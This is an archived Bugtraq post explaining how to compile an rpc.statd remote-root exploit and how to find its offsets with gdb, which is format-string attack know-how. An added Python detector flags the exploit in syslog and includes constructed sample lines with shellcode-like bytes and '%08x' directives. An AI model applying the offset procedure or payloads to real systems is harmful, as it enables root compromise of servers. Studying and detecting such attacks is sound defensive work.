[16056] in bugtraq
rpc.statd remote root xploit for linux/x86 (little fix)
daemon@ATHENA.MIT.EDU (Doing)
Wed Aug 2 13:39:53 2000
Message-Id: <398841AA.43018B2C@teleline.es>
Date: Wed, 2 Aug 2000 15:43:38 +0000
Reply-To: Doing <jdoing@teleline.es>
From: Doing <jdoing@TELELINE.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
To compile the xploit you need the librpcsvc library:
gcc statd.c -o statd -lrpcsvc
How to find the offsets for your distro/version:
Launch statd and attach to it with gdb:
[root@localhost statd]# ./statd
[root@localhost statd]# ps aux | grep st
root 394 0.0 0.9 1184 576 ? S 15:27 0:00 ./statd
[root@localhost statd]# gdb ./statd
GNU gdb 4.18
[ cut cut cut cut ]
(gdb) attach 394
Attaching to program: /zecreto/doing/xploits/daemon/rpc.statd/knfsd-1.3.2/utils/statd/./statd, process 394
[ Now put a breakpoint on the function log() ]
(gdb) break log
Breakpoint 1 at 0x804a10a: file log.c, line 82.
(gdb) c
Continuing.
[ At this point run the xploit ]
Breakpoint 1, log (level=2, fmt=0x804c820 "SM_MON request for hostname containing '/': %s") at log.c:82
82 va_start(ap, fmt);
[ And put another breakpoint in the function syslog() ]
(gdb) break syslog
Breakpoint 2 at 0x400d12e6: file syslog.c, line 102.
(gdb) c
Continuing.
Breakpoint 2, syslog (pri=2,
    fmt=0xbfffef38 "SM_MON request for hostname containing '/': [garbage]..)
        ^^^^^^^^^^
The fmt argument of syslog() (here 0xbfffef38) is the address of the buffer in
log(). Run the xploit with this value and it should work.
Doing
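A defender-side check for the message seen in the trace above, added here as an example and not part of the original post: it scans syslog lines for rpc.statd's "SM_MON request for hostname containing '/'" message, which no legitimate NFS client should ever trigger, and raises the severity when the hostname field carries non-printable bytes, a leftover '%' directive or an oversized payload. The syslog line layout and the sample lines are constructed assumptions, not real logs.

```python
import re
from typing import List, Tuple

# The message rpc.statd's log() builds and then hands to syslog() as its
# format string, exactly as it appears in the gdb trace above.
SM_MON_MSG = "SM_MON request for hostname containing '/': "

# Assumed BSD-style syslog layout: timestamp, host, program[pid]: message.
SYSLOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
                       r"(?P<prog>[\w.-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")


def classify(line: str) -> Tuple[str, List[str]]:
    """Return (severity, reasons) for one syslog line; severity is 'none', 'medium' or 'high'."""
    m = SYSLOG_RE.match(line)
    if not m or SM_MON_MSG not in m.group("msg"):
        return "none", []
    # Everything after the fixed prefix is what the client sent as its hostname.
    tail = m.group("msg").split(SM_MON_MSG, 1)[1]
    # A '/' in a monitored hostname is never legitimate, so the message alone is worth an alert.
    reasons = ["SM_MON hostname contained '/'"]
    if any(not 0x20 <= ord(c) <= 0x7E for c in tail):
        reasons.append("non-printable bytes in hostname field")
    if "%" in tail:
        reasons.append("unrendered format directive in hostname field")
    if len(tail) > 255:
        reasons.append("hostname field exceeds 255 bytes")
    return ("high" if len(reasons) > 1 else "medium"), reasons


def scan(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, severity, reasons) for every line that is not benign."""
    hits = []
    for n, line in enumerate(lines, 1):
        sev, why = classify(line)
        if sev != "none":
            hits.append((n, sev, why))
    return hits


# Constructed sample lines: one unrelated, one with a bare '/', one with shellcode-like bytes.
SAMPLE_LOG = [
    "Aug  2 15:26:40 localhost rpc.statd[394]: constructed benign line",
    "Aug  2 15:27:05 localhost rpc.statd[394]: " + SM_MON_MSG + "client/evil",
    "Aug  2 15:27:09 localhost rpc.statd[394]: " + SM_MON_MSG
    + "\x90\x90\x90/bin/sh\x18\x19%08x%08x",
]

if __name__ == "__main__":
    for n, sev, why in scan(SAMPLE_LOG):
        print(f"line {n}: {sev}: {'; '.join(why)}")
```

Because the logged text is whatever syslog() rendered from the attacker's buffer, this catches attempts and partially rendered payloads; a run that crashed statd before the message was written leaves nothing to match, so pair it with a crash or restart alert.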